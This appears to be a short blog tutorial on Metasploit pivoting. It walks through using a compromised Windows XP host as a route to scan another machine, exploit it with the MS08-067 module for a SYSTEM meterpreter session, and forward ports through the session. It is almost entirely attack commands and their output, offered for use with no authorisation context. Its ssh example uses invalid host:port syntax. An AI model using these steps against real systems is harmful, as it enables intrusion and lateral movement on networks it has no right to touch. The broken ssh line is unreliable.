So you’ve owned a box and now you want to exploit others using the first as a pivot.
First thing to do is background your current meterpreter session:

1
2
3
4
5
6
7
meterpreter > background
msf exploit(multi_handler) > sessions -l
Active sessions
===============
Id  Type                   Information                   Connection
--  ----                   -----------                   ----------
1   meterpreter x86/win32  XPSP0\Administrator @ XPSP0   81.142.243.100:21 -> 1.2.3.4:1050

Then add the pivot: route add [ip of target] [subnet] [meterpreter session id]

1
2
3
4
5
6
7
8
msf exploit(ms08_067_netapi) > route add 1.2.3.4 255.255.255.0 1
msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
Subnet             Netmask            Gateway
------             -------            -------
1.2.3.4      255.255.255.0      Session 1
msf exploit(ms08_067_netapi) >

Now to run a tcp scan through the pivot 🙂

1
2
3
4
5
6
7
msf exploit(ms08_067_netapi) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 1.2.3.10
RHOSTS => 1.2.3.10
msf auxiliary(tcp) > run
[*] 1.2.3.10:139 - TCP OPEN
[*] 1.2.3.10:135 - TCP OPEN
[*] 1.2.3.10:445 - TCP OPEN

Then simply exploit the second box using the same metasploit console:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    1.2.3.10    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/bind_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST     1.2.3.10    no        The target address
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes)
[*] Meterpreter session 2 opened (81.142.243.100-1.2.3.4:0 -> 1.2.3.5:4444) at 2011-06-20 10:56:13 +0100

And to show the second session running through the first we’ll list the sessions again:

1
2
3
4
5
6
7
8
9
10
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
  Id  Type                   Information                   Connection
  --  ----                   -----------                   ----------
  1   meterpreter x86/win32  XPSP0\Administrator @ XPSP0   81.142.243.100:21 -> 1.2.3.4:1050
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ XPSP0C  81.142.243.100-1.2.3.4:0 -> 1.2.3.10:4444

msf exploit(ms08_067_netapi) >

Sweet!!!

UPDATE:
I forgot to mention the ability to port forward from within a meterpreter session:
Lets just say that the target2 [1.2.3.10] had ssh on it and you wanted to connect to that ssh session but couldn’t do so directly…. well, this is where the portfwd command comes in.

1
2
3
msf > sessions -i 1
meterpreter > portfwd add -l 44422 -p 22 -r 1.2.3.10
[*] Local TCP relay created: 0.0.0.0:44422 <-> 1.2.3.10:22

What the above does is map the local TCP port 44422 on the attackers box to TCP port 22 on 1.2.3.10. Now simply connect to the target2 from a console using:

1
ssh 127.0.0.1:44422

The above applies for any service, simply just map it to an unused local port (to save confusion try to make the ports easy to understand, i append 4’s to the port).

1
2
3
remote:80 --> local:44480
remote:22 --> local:44422
remote:8080--> local:48080

Leave a Reply